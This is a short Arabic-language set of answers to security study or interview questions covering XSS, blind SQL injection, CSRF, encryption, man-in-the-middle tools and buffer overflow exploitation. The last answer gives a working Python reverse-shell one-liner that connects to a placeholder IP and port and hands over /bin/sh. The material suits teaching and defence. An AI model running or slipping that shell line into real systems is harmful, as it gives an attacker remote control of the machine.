Abdulmalek Majeed

الإجابة: XSS المخزن (Stored) يُخزن الكود الخبيث في قاعدة البيانات ويُنفذ عند كل زيارة للصفحة. بينما XSS المنعكس (Reflected) يُنفذ فوراً من خلال رابط ملغم ولا يُخزن. المخزن أخطر لأنه يصيب جميع الزوار.

الإجابة: Blind SQLi لا تُظهر نتائج مباشرة، بل تعتمد على استنتاج المعلومات من سلوك التطبيق (True/False responses أو Time-based delays). النوع العادي يُظهر بيانات قاعدة البيانات مباشرة في الصفحة.

الإجابة: CSRF يجبر المستخدم على تنفيذ إجراءات غير مرغوبة في موقع مُصادق عليه. الحماية: استخدام CSRF Tokens، التحقق من Referer Header، استخدام SameSite Cookies، وطلب إعادة المصادقة للعمليات الحساسة.

الإجابة: المتماثل (Symmetric): مفتاح واحد للتشفير وفك التشفير (مثل AES, DES). غير المتماثل (Asymmetric): مفتاحان - عام للتشفير وخاص لفك التشفير (مثل RSA, ECC). غير المتماثل أبطأ لكن أكثر أماناً لتبادل المفاتيح.

الإجابة: MITM: المهاجم يعترض الاتصال بين طرفين ويمكنه قراءة/تعديل البيانات. الأدوات: Ettercap, Bettercap, Wireshark, mitmproxy, arpspoof. يتم عبر ARP Spoofing, DNS Spoofing, أو SSL Stripping.

الإجابة: Buffer Overflow: كتابة بيانات تتجاوز حجم الذاكرة المخصصة. للاستغلال: تجاوز Return Address بعنوان Shellcode، استخدام NOP Sled للوصول للـ Shellcode، تجاوز حماية ASLR/DEP باستخدام ROP Chains.

الإجابة: Reverse Shell: الهدف يتصل بالمهاجم (عكس Bind Shell). كود Python:
import socket,subprocess,os; s=socket.socket(); s.connect(("IP",PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])